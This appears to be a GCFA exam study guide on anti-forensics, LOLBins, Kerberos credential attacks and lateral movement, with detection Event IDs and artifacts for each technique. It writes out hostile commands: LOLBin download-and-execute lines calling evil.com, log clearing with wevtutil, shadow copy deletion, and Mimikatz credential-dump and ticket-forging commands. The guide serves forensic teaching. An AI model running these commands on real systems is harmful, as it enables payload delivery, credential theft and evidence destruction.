GCFA Anti-Forensics & Lateral Movement Study Guide

Anti-Forensics & Lateral Movement

Attackers cover their tracks and spread across the environment — this topic ties together evasion, credential theft, and movement techniques.

GCFA Exam Focus: This final topic covers how attackers evade detection, manipulate evidence, move laterally using stolen credentials, and maintain persistence. Expect 15–20 questions integrating these concepts with artifact and log analysis skills from earlier topics.

🗺️ Attacker Lifecycle — Evasion & Movement

Initial Access

Phishing, exploit, VPN brute-force

Establish Foothold

Beacon/implant, persistence keys

Credential Harvest

Mimikatz, PtH, Kerberoasting

Lateral Movement

PsExec, WMI, WinRM, RDP

Privilege Escalation

Golden/Silver Ticket, DCSync

Anti-Forensics

Timestomp, log clear, LOLBins

Impact

Exfil, ransomware, destruction

🧹 Anti-Forensics

Timestomping ($SI manipulation)
Log clearing (wevtutil, Event 1102)
Secure file deletion (SDelete, cipher)
Rootkits & DKOM
Steganography & encryption
Detection via $FN timestamps

🔧 LOLBins

certutil — download & decode
mshta — execute HTA scripts
regsvr32 — COM scriptlet bypass
rundll32 — DLL execution
bitsadmin — file transfer
wmic, PowerShell, msiexec

🔑 Credential Attacks

Pass-the-Hash (NTLM)
Pass-the-Ticket (Kerberos)
Kerberoasting (SPN accounts)
AS-REP Roasting (no preauth)
Golden Ticket (KRBTGT hash)
Silver Ticket (service hash)
DCSync (replication rights)

↔️ Lateral Movement

PsExec (SMB 445 + admin share)
WMI (port 135 + DCOM)
WinRM / PowerShell Remoting
RDP (port 3389)
DCOM lateral movement
SSH (Linux environments)

🛠️ Key Attacker & Analyst Tools

Tool	Category	Key Use	Detection / Analyst Counter
Mimikatz	Credential	sekurlsa::logonpasswords, lsadump::dcsync, kerberos::golden	Event 4624 Type 3, lsass access (Event 10 Sysmon), PPL protection
Impacket	Lateral Move	secretsdump.py, psexec.py, wmiexec.py, smbexec.py, GetUserSPNs.py	SMB Event 5140/5145, WMI Event 4688 + WmiPrvSE parent
BloodHound	Recon	AD path enumeration (SharpHound collector), attack paths via graph DB	LDAP query volume (Event 1644), SharpHound signatures
Rubeus	Kerberos	Kerberoasting, AS-REP roasting, ticket harvesting, golden/silver	Event 4769 (high volume RC4 tickets), Event 4768 preauth=0
CobaltStrike	C2 / Post-Exploit	Beacon implant, lateral movement via jump, credential harvesting	Named pipe artifacts, Sysmon 17/18, process anomalies, network IOCs
SDelete	Anti-Forensics	Secure file overwrite (DoD 5220.22-M), wipes MFT filename	$USNJrnl shows rename to ZZZZZZZ before deletion
wevtutil	Log Clearing	wevtutil cl Security — clears event log	Event 1102 (Security), Event 104 (System)

⚡ High-Yield Facts for Exam Day

Concept	Must-Know Detail
Timestomping detection	$SI Modified < $FN Modified — kernel ($FN) never lies; $SI is user-modifiable
Log cleared Event IDs	1102 = Security log cleared; 104 = System log cleared; look for gaps
Golden Ticket	Requires KRBTGT NTLM hash; forges TGT; default lifetime = 10 years; survives password reset (need 2 resets)
Silver Ticket	Requires service account hash only; forges ST for specific service; does NOT contact DC
Kerberoasting	Requests RC4 service ticket for SPN accounts; detected by Event 4769 with EncryptionType = 0x17 (RC4)
AS-REP Roasting	Targets accounts with UF_DONT_REQUIRE_PREAUTH; detected by Event 4768 with PreAuthType = 0
DCSync	Requires DS-Replication-Get-Changes-All privilege; generates Event 4662; Mimikatz lsadump::dcsync
PsExec artifacts	Creates PSEXESVC service (Event 7045) + SMB admin share access (Event 5140); runs as SYSTEM
WMI persistence	EventFilter + EventConsumer + FilterToConsumerBinding — survives reboot; stored in CIM repository
certutil abuse	certutil -urlcache -split -f [URL] = download; certutil -decode = base64 decode (common LOLBin)
Pass-the-Hash	Uses NTLM hash (not password); works against services accepting NTLM auth; detected by Event 4624 Type 3
Overpass-the-Hash	Uses NTLM hash to request Kerberos TGT; allows full Kerberos auth with just a hash

Anti-Forensics Techniques

How attackers manipulate evidence — and how forensic analysts detect each technique.

⏱️ Timestomping — Deep Dive

Attackers modify $STANDARD_INFORMATION ($SI) timestamps using tools like Metasploit timestomp, BulkFileChanger, or custom code. The $FILENAME ($FN) timestamps are set by the Windows kernel and cannot be modified from user space.

$SI vs $FN Timestamp Comparison
$STANDARD_INFORMATION	User-space modifiable; timestomping target; 4 timestamps (MACE)
$FILENAME	Kernel-set on file creation/rename; not user-modifiable; 4 timestamps (MACE)
Timestomp indicator	$SI Created < $FN Created (impossible unless tampered)
Detection tool	MFTECmd + Timeline Explorer; Plaso super timeline
$USNJrnl indicator	First entry in journal = true creation time; compare with $SI
Sysmon Event 2	File creation time changed — logs both old and new timestamps

Timestomping Detection Checklist

Compare $SI timestamps vs $FN timestamps
$SI Created timestamp = round number? (e.g., 00:00:00) = suspicious
Check $USNJrnl for file's first journal entry
Check Sysmon Event 2 for original timestamp
Check Prefetch file embedded timestamps
Look for $SI date predating OS installation date

🗑️ Log Clearing & Event Log Manipulation

Technique	Command / Method	Evidence Left Behind
Clear Security log	`wevtutil cl Security`	Event 1102 in Security log (last event before clearing)
Clear System log	`wevtutil cl System`	Event 104 in System log
PowerShell clear	`Clear-EventLog -LogName Security`	Event 1102; PowerShell Script Block (Event 4104)
Delete .evtx files	Direct file deletion while service running	VSS shadow copy; $USNJrnl shows deletion
Selective record deletion	Hex edit .evtx file, corrupt CRC checksums	Chainsaw / Event log parser detects bad checksums
Log time gap	Any clearing method	Gap in sequential Event Record IDs; time jump in log

Key insight: Event 1102 is logged by the Security log itself just before being cleared — it survives in SIEM/forwarded logs even when the local log is wiped. Always check central logging for 1102/104.

🧹 File Deletion & Secure Wiping

Standard Deletion

MFT entry marked as unallocated; data remains on disk; $USNJrnl records the deletion; $I30 slack may retain filename. Recoverable via file carving (PhotoRec, Autopsy).

SDelete (Sysinternals)

Overwrites file data (DoD 5220.22-M); renames file to ZZZZZZZZ before deletion — visible in $USNJrnl as a suspicious rename pattern. Detectable via $USNJrnl rename sequence.

cipher /w

Windows built-in free-space wipe: cipher /w:C:\ overwrites all unallocated space. Makes carving of previously deleted files impossible.

Alternate Data Streams

NTFS feature: file.txt:hidden.exe — stores data in named ADS. Used to hide payloads. Detected via dir /r, Sysinternals Streams, or MFT analysis.

Rootkit File Hiding

Kernel-mode rootkits intercept filesystem API calls; files hidden from dir/Explorer but visible via offline MFT analysis or memory forensics (Volatility filescan).

Volume Shadow Copies

VSS snapshots = forensic goldmine even after attacker deletes/wipes files. Attackers counter with: vssadmin delete shadows /all or WMI: Win32_ShadowCopy.Delete().

🔒 Persistence Mechanisms

Mechanism	Location / Command	Detection Event ID
Registry Run Keys	`HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (and HKCU equivalent)	Sysmon 13 (Registry set); Registry Explorer baseline comparison
Scheduled Tasks	`schtasks /create` or Task Scheduler XML	4698 (task created), 4702 (modified), 4699 (deleted)
Services	`sc create` or New-Service	7045 (service installed), 7034/7035/7036 (state changes)
DLL Hijacking	Drop malicious DLL in app search path before legitimate DLL	Sysmon 7 (DLL load); ProcMon NAME_NOT_FOUND then load from unexpected path
WMI Subscription	EventFilter + EventConsumer (ActiveScriptEventConsumer) + FilterToConsumerBinding	Sysmon 19/20/21; WMI activity log; CIM repository analysis
Startup Folder	`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`	Sysmon 11 (file create); Autoruns baseline
COM Hijacking	HKCU\Software\Classes\CLSID overrides HKLM COM objects	Sysmon 13; Registry analysis (HKCU takes precedence)
Boot/MBR	Overwrite MBR or VBR; UEFI bootkits	Disk forensics; Secure Boot verification; known-good MBR hash comparison

LOLBins & Living Off the Land

Attackers use legitimate Windows binaries to bypass application whitelisting, execute code, and avoid detection — "Living Off the Land Binaries."

Why LOLBins work: These binaries are signed by Microsoft, trusted by AV/EDR, and expected to run in enterprise environments. Detection requires behavioral analysis (command line arguments, parent process, network activity) rather than signature matching.

certutil.exe

Certificate utility — abused for file download and base64 decode/encode

certutil -urlcache -split -f http://evil.com/payload.exe certutil -decode encoded.txt payload.exe

mshta.exe

Microsoft HTML Application host — executes VBScript/JScript in .hta files

mshta http://evil.com/shell.hta mshta vbscript:Execute("...")

regsvr32.exe

COM object registration — Squiblydoo: executes remote scriptlets, bypasses AppLocker

regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll

rundll32.exe

Executes DLL exports — abused to run malicious DLL functions directly

rundll32.exe evil.dll,EntryPoint rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"

msiexec.exe

Windows Installer — executes remote or local MSI packages silently

msiexec /q /i http://evil.com/malware.msi

bitsadmin.exe

Background Intelligent Transfer Service — file download and persistence via BITS jobs

bitsadmin /transfer job http://evil.com/file C:\file

wmic.exe

WMI command line — execute processes locally or remotely, query system info

wmic /node:TARGET process call create "cmd.exe /c..."

powershell.exe

The most abused LOLBin — encoded commands, download cradles, reflective loading

powershell -enc [base64] -NoP -NonI -W Hidden

cscript / wscript

Windows Script Host — executes VBScript and JScript files

wscript //b //nologo evil.vbs

odbcconf.exe

ODBC configuration — executes DLL via REGSVR action

odbcconf.exe /a {REGSVR evil.dll}

InstallUtil.exe

.NET installer — executes arbitrary .NET code via /U flag, bypasses AppLocker

InstallUtil.exe /logfile= /U evil.exe

forfiles.exe

File iterator — can execute commands per file, used for indirect command execution

forfiles /p C:\ /m calc.exe /c "cmd.exe /c evil.cmd"

🔍 LOLBin Detection Strategy

Detection Layer	What to Look For
Command Line Logging	Event 4688 with process command line (requires GPO) or Sysmon Event 1 — look for unusual arguments, URLs, base64 strings, suspicious flags
Parent Process Anomalies	Word/Excel spawning cmd.exe, PowerShell, mshta — Office macros executing LOLBins
Network Activity	certutil, bitsadmin, PowerShell making outbound HTTP connections — Sysmon Event 3 (network) + Event 1 (process)
Execution from Temp/AppData	Binaries executed from %TEMP%, %APPDATA%, C:\Users\* — not typical for sysadmin use
Unusual Times	LOLBin execution at 03:00 AM, outside business hours — correlate with logon events
Script Block Logging	PowerShell Event 4104 — captures decoded/decrypted script content even with -enc flag
AMSI Bypass Attempts	PowerShell Event 4104 containing known AMSI bypass strings; script block size anomalies
Prefetch Artifacts	Presence of certutil.exe, mshta.exe, etc. in Prefetch — confirms execution even if log cleared

⚡ PowerShell Forensics

Log Source	Content	Location
Module Logging (4103)	Module pipeline output	HKLM\...\PowerShell\ModuleLogging
Script Block (4104)	Full script content decoded	HKLM\...\PowerShell\ScriptBlockLogging
Transcription	Full session input/output	Configured output directory
ConsoleHost_history.txt	Interactive command history	%APPDATA%\...\PSReadLine\
Event 800/600	V2 PowerShell (downgrade attack)	Windows PowerShell log

PowerShell Downgrade Attack

Attacker explicitly invokes PowerShell v2 to bypass Script Block Logging (v3+ feature):

powershell -version 2 -enc [base64]

Detection: Event 400 in Windows PowerShell log with EngineVersion = 2.0 + modern OS (Win10/2016+) — v2 should never be legitimately used on modern systems.

Lateral Movement & Credential Attacks

Credential theft techniques, Kerberos attacks, and the tools/artifacts for each lateral movement method.

🎫 Kerberos Attack Techniques

Attribute

Golden Ticket

Silver Ticket

What's forged

TGT (Ticket Granting Ticket)

Service Ticket (ST)

Hash needed

KRBTGT NTLM hash

Service account NTLM hash

Access granted

Any service in the domain

Specific service only

DC contacted?

No (fully offline)

Default lifetime

10 years (by default)

30 days (by default)

Survives reset?

Survives 1 KRBTGT reset; need 2

Survives service acct reset

Mimikatz command

kerberos::golden

kerberos::silver

Detection event

4768 (TGT request from non-DC)

4769 with forged PAC data

Kerberos Attack	Target	How It Works	Detection
Kerberoasting	Service accounts with SPNs	Request RC4 service ticket for SPN account; crack hash offline with hashcat/JtR	Event 4769 (EncryptionType=0x17 = RC4); high volume from single host; off-hours requests
AS-REP Roasting	Accounts with "Do not require Kerberos preauthentication"	Send AS-REQ without pre-auth; DC returns AS-REP encrypted with password hash; crack offline	Event 4768 (PreAuthType=0); Rubeus detect; monitor UF_DONT_REQUIRE_PREAUTH attribute
Pass-the-Ticket	Active Kerberos tickets in memory	Export TGT/ST from lsass/ccache; inject into current session; authenticate as victim	Event 4768/4769 from unusual source; ticket lifetime anomalies; Mimikatz sekurlsa::tickets
Overpass-the-Hash	Users where Kerberos preferred	Use NTLM hash to request Kerberos TGT via Mimikatz sekurlsa::pth; full Kerberos auth	Event 4768 TGT request with NTLM-derived key; logon anomaly detection

↔️ Lateral Movement Techniques & Artifacts

Method	Protocol/Port	Source Artifacts	Target Artifacts
PsExec	SMB / 445	Event 5140 (share access), process execution, prefetch PSEXESVC	7045 (PSEXESVC service installed), 4624 Type 3, PSEXESVC prefetch
WMI	DCOM / 135	Event 4688 wmic.exe; Sysmon 3 (outbound 135)	WmiPrvSE.exe spawning child process (Sysmon 1); Event 4688 with WmiPrvSE parent
WinRM / PSRemoting	HTTP 5985 / HTTPS 5986	WSMan PowerShell calls; Event 4688	Event 4624 Type 3, WSMan Operational log; wsmprovhost.exe parent
RDP	RDP / 3389	RDPClient Event 1024 (outbound); Bitmap cache; mstsc recent connections	Security 4624 Type 10, LSM 21 (connected), RemoteConnectionManager 1149 (source IP pre-auth)
DCOM	DCOM / 135+dynamic	Event 4688 (DCOM client process)	DCOM object execution in DCOM server process; Event 4688 with unexpected parent
Pass-the-Hash	SMB/NTLM / 445	Mimikatz artifacts; Event 4624 Type 3 from attacker host	Event 4624 Type 3 (NTLM auth); no Kerberos TGT request (4768); anonymous or NTLM logon type
DCSync	MS-DRSR (LDAP) / 389,636	mimikatz lsadump::dcsync run; Sysmon network to DC	Event 4662 on DC: Object=domain, DS-Replication-Get-Changes-All; source = non-DC host

🔑 Mimikatz Command Reference

Module::Command	What It Does
`sekurlsa::logonpasswords`	Dump credentials from lsass — NTLM, Kerberos, WDigest (cleartext if enabled)
`sekurlsa::pth`	Pass-the-Hash — spawn process using NTLM hash
`sekurlsa::tickets`	List Kerberos tickets in memory
`lsadump::sam`	Dump local SAM database (local account hashes)
`lsadump::dcsync`	DCSync — replicate DC hashes without touching DC disk
`lsadump::lsa /patch`	Dump all LSA secrets from lsass
`kerberos::golden`	Forge Golden Ticket with KRBTGT hash
`kerberos::silver`	Forge Silver Ticket with service account hash
`kerberos::ptt`	Pass-the-Ticket — inject forged/stolen ticket into session
`privilege::debug`	Enable SeDebugPrivilege (required for lsass access)

LSASS Protection

Protected Process Light (PPL) — Win8.1+; requires signed driver to bypass
Credential Guard (Win10+) — isolates NTLM/Kerberos in Hyper-V VTL1
WDigest disabled — reg: HKLM\SYSTEM\...\WDigest\UseLogonCredential = 0 (default Win8.1+)
Detection: Sysmon Event 10 (ProcessAccess) — lsass.exe as target from non-system process

DCSync Artifacts

Event 4662 on the DC:

Object Type: domainDNS
Accesses: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
Source: non-DC computer account
Only Domain Admins + Domain Controllers should have these rights

Practice Quiz

10 questions covering anti-forensics, LOLBins, credential attacks, and lateral movement.

Memory Hooks

Mnemonics and mental models to lock in the hardest concepts.

🎫 Ticket Hierarchy

"KRBTGT = Master Key, Service Hash = Room Key"

Golden Ticket uses KRBTGT → opens ANY door in the domain. Silver Ticket uses service account hash → opens only THAT service's door. Golden Ticket requires TWO KRBTGT password resets to invalidate.

🔑 PtH vs PtT

"Hash = NTLM, Ticket = Kerberos"

Pass-the-Hash uses the NTLM hash directly — the hash IS the password to NTLM auth. Pass-the-Ticket steals a Kerberos ticket from memory — no password or hash needed, just a valid ticket.

☕ Roasting Duo

"SPN → Kerberoast | No-Preauth → AS-REP Roast"

Kerberoasting targets SPN accounts (service accounts) → request RC4 ticket → crack. AS-REP Roasting targets accounts with no preauth flag → AS-REP returned encrypted with password → crack offline.

⏱️ Timestomp Catch

"$FN Never Lies — $SI Can Be Dressed Up"

$FN timestamps are kernel-set and immune to user-space tampering. If $SI Created is EARLIER than $FN Created, the file was timestomped. Also: round-number $SI timestamps (00:00:00.000) are a major red flag.

🏠 PsExec Fingerprint

"PsExec Leaves Its Name — PSEXESVC"

PsExec always installs the PSEXESVC service on the target (Event 7045). It accesses admin shares (Event 5140 — \\SHARE or ADMIN$). Find it in Prefetch, Service records, and Event Logs even after execution ends.

🌿 LOLBin Detection

"What's Normal? Parent + Args + Network"

certutil making network connections = suspicious. Word spawning PowerShell = suspicious. mshta running from Temp = suspicious. The binary itself is innocent — its parent, arguments, and network behavior tell the story.

📋 Complete High-Yield Reference

Topic	Key Number / Fact
Log cleared (Security)	Event 1102
Log cleared (System)	Event 104
Service installed	Event 7045
Scheduled task created	Event 4698
DCSync detection	Event 4662 on DC — DS-Replication-Get-Changes-All from non-DC
Kerberoasting detection	Event 4769 — EncryptionType = 0x17 (RC4)
AS-REP Roasting detection	Event 4768 — PreAuthType = 0
PtH detection	Event 4624 Type 3 — NTLM auth, no prior 4768 Kerberos TGT
Timestomping	$SI Modified < $FN Modified; Sysmon Event 2
Golden Ticket requires	KRBTGT NTLM hash; survives 1 reset; need 2 KRBTGT resets
Silver Ticket requires	Service account NTLM hash; offline; no DC contact
SDelete forensic artifact	$USNJrnl shows rename to ZZZZZZZZ before deletion
WMI persistence components	EventFilter + EventConsumer + FilterToConsumerBinding
Sysmon Event 10	ProcessAccess → lsass.exe being accessed = credential theft
RDP pre-auth log	RemoteConnectionManager Event 1149 — source IP recorded before auth

Flashcards

Click a card to reveal the answer.

Kerberos Attacks

What is a Golden Ticket attack? What hash is required and what can the attacker do with it?

Tap to reveal ↓

Answer

Golden Ticket forges a Kerberos TGT using the KRBTGT NTLM hash. The forged TGT grants access to any service in the domain. It's valid for 10 years by default, does not require DC contact, and survives one KRBTGT password reset — you need two consecutive resets to invalidate it. Mimikatz: kerberos::golden.

Kerberos Attacks

How does Kerberoasting work? What Event ID reveals it, and what's the key indicator?

Tap to reveal ↓

Answer

Attacker requests a service ticket for any SPN account (any user can do this). The ticket is encrypted with the service account's NTLM hash. Attacker cracks it offline. Detection: Event 4769 with EncryptionType = 0x17 (RC4) — legitimate Kerberos uses AES (0x12/0x11). High volume from single host = Kerberoasting.

Credential Attacks

What is Pass-the-Hash? How does it differ from Pass-the-Ticket?

Tap to reveal ↓

Answer

Pass-the-Hash (PtH): uses the NTLM hash directly to authenticate — no plaintext password needed. Works against NTLM authentication (SMB, WMI, etc.). Detected by Event 4624 Type 3 with NTLM auth.

Pass-the-Ticket (PtT): steals a Kerberos ticket from memory and injects it into a session — no hash or password needed, uses Kerberos protocol.

Lateral Movement

What artifacts does PsExec leave on the TARGET system?

Tap to reveal ↓

Answer

On the target:
• Event 7045 — PSEXESVC service installed
• Event 4624 Type 3 — network logon
• Event 5140 — admin share access (ADMIN$ or IPC$)
• Prefetch: PSEXESVC.EXE
• Service entry in registry: HKLM\SYSTEM\...\Services\PSEXESVC
Runs as SYSTEM — elevated automatically.

Anti-Forensics

How do you detect timestomping? What two artifact sources reveal the true timestamp?

Tap to reveal ↓

Answer

Compare $SI (user-modifiable) vs $FN (kernel-set):
• If $SI Created < $FN Created → timestomping
• If $SI timestamps are round numbers (00:00:00.000) → suspicious

True creation time sources:
• $USNJrnl — first change journal entry
• Sysmon Event 2 — file creation time changed (logs old + new timestamps)

Persistence

What are the three components of WMI persistence? What makes it stealthy?

Tap to reveal ↓

Answer

WMI persistence = EventFilter + EventConsumer + FilterToConsumerBinding

• EventFilter: triggers (e.g., system startup, time interval)
• EventConsumer: action (ActiveScriptEventConsumer = execute code)
• Binding: links filter to consumer

Stealthy because: stored in CIM repository (not filesystem), survives reboot, no obvious files. Detected via Sysmon Events 19/20/21 and CIM repository analysis.

LOLBins

What is certutil used for by attackers? What two main abuse techniques should you know?

Tap to reveal ↓

Answer

certutil.exe (certificate utility) is abused for:

1. File download: certutil -urlcache -split -f [URL] outfile
2. Base64 decode: certutil -decode encoded.txt payload.exe

Detection: certutil making outbound HTTP connections (Sysmon Event 3), or certutil in unusual directories. Check Prefetch for certutil execution + command line logging (Event 4688 or Sysmon 1) for suspicious arguments.

DCSync

How is DCSync detected? What Event ID and what properties indicate a DCSync attack?

Tap to reveal ↓

Answer

DCSync is detected via Event 4662 on the Domain Controller:

• Object: domainDNS (the domain partition)
• Access Rights: DS-Replication-Get-Changes-All
• Source: non-DC computer account

Only Domain Controllers and explicitly delegated accounts should replicate. Mimikatz command: lsadump::dcsync /domain:X /user:krbtgt. Can pull any account hash without touching DC disk.

AI Study Advisor

Personalized guidance for this topic.

📌 Exam Strategy

⚠️ Common Mistakes

⚡ Quick Review

🔬 Deep Dive

🎯 Practice Tips

📌 Exam Strategy — Anti-Forensics & Lateral Movement

This topic integrates with all previous ones. Expect scenario questions where you identify the attack technique from event IDs, artifacts, or log patterns — not isolated trivia.
Memorize the Golden vs Silver Ticket comparison cold: hash needed, scope, DC contact, lifetime. These are tested directly and in scenario form.
Know your Event IDs by number: 1102, 104 (log clear), 4662 (DCSync), 4769 (Kerberoasting), 4768 (AS-REP roasting), 7045 (service), 4698 (scheduled task).
For LOLBin questions, focus on certutil, mshta, regsvr32 — these appear most often. Know the detection method (command line logging + parent process + network).
Timestomping questions will ask what comparison reveals the tampering: $SI vs $FN, and what tools/events confirm the true timestamp ($USNJrnl, Sysmon Event 2).

⚠️ Common Mistakes to Avoid

Confusing Golden vs Silver Ticket scope: Golden = domain-wide (KRBTGT hash), Silver = one service (service hash). Golden does NOT require the service account hash.
Forgetting that both Golden and Silver Tickets are fully offline — no DC contact needed. Attackers do NOT need to talk to the DC to use a forged ticket.
Mixing up Kerberoasting (4769, SPN accounts, RC4 EncType) with AS-REP Roasting (4768, no-preauth accounts, PreAuthType=0).
Assuming PsExec is hidden: it always installs PSEXESVC (Event 7045) and leaves extensive artifacts — it is NOT stealthy in forensics.
Forgetting that WMI persistence stores in the CIM repository, not the filesystem — file-based forensics won't find it; need CIM analysis or Sysmon 19/20/21.
Saying "Golden Ticket is fixed by one KRBTGT reset" — it takes TWO consecutive resets to invalidate all forged tickets.

⚡ Quick Review — 5-Minute Refresh

Log cleared: Security=1102 | System=104 | look for gaps in Event Record IDs
Golden Ticket: KRBTGT hash → any service → 10yr → offline → 2 resets to kill
Silver Ticket: Service account hash → one service → offline → no DC contact
Kerberoasting: SPN accounts → 4769 + EncType 0x17 (RC4) → crack offline
AS-REP Roasting: No-preauth accounts → 4768 + PreAuthType=0 → crack offline
DCSync: 4662 on DC → DS-Replication-Get-Changes-All → from non-DC = attack
PsExec: 7045 (PSEXESVC) + 5140 (share) + 4624 Type 3 → runs as SYSTEM
Timestomping: $SI < $FN → stomped; Sysmon 2 = original timestamp
certutil abuse: download (-urlcache) + decode (-decode) → detect via Sysmon 3
WMI persistence: Filter + Consumer + Binding → CIM repository → Sysmon 19/20/21

🔬 Deep Dive — Advanced Concepts

Overpass-the-Hash: Uses NTLM hash to request a Kerberos TGT via Mimikatz sekurlsa::pth. Result: full Kerberos authentication using only an NTLM hash — bypasses restrictions on pure PtH environments.
KRBTGT double reset: Because Kerberos tickets are validated against the current KRBTGT key, resetting once doesn't immediately kill existing Golden Tickets — attackers who harvest KRBTGT still have the old key. Two consecutive resets invalidate the previous key entirely.
SDelete forensics: SDelete renames the file to a string of Z's before deletion — this rename shows up in the $USNJrnl as a suspicious event. File carving is impossible after SDelete due to overwriting, but the $USNJrnl rename chain reveals the file existed.
Credential Guard: Isolates NTLM hashes and Kerberos tickets in a Hyper-V Virtual Trust Level 1 (VTL1) environment. Mimikatz cannot extract credentials from a system with Credential Guard enabled — attackers must use alternative techniques like token impersonation or network-based credential capture.
Regsvr32 / Squiblydoo: regsvr32 /s /n /u /i:[URL] scrobj.dll — executes a remote .SCT (COM scriptlet) file. Because regsvr32 is signed and trusted, it bypasses many application whitelisting solutions. The URL-based execution means no file written to disk.

🎯 Practice Tips — How to Study This Topic

Create a two-column table: attack technique on the left, detection Event IDs + artifacts on the right. Drill until you can recall both directions instantly.
Practice scenario questions: "An analyst sees Event 4769 from one workstation to 20 service accounts within 5 minutes at 2 AM. What is the attack?" — Kerberoasting. Build these mental patterns.
Map Mimikatz modules to attack techniques: sekurlsa=credential dump, lsadump=SAM/DCSync, kerberos=ticket attacks. Know which module does what.
For LOLBins, study the LOLBAs website (lolbas-project.github.io) — GCFA FOR508 directly references this resource. Focus on the Execute, Download, and Bypass categories.
Review the full GCFA series: timestamps from Topic 4 integrate with anti-forensics here; process analysis from Topic 3 (Volatility) helps detect injection-based lateral movement; Windows artifacts from Topic 2 cover the registry persistence mechanisms.

Ready to Pass the GCFA?

Test your knowledge with full-length GCFA practice exams on FlashGenius — questions modeled on the real FOR508 exam domains.

Unlock Full Practice Tests on FlashGenius →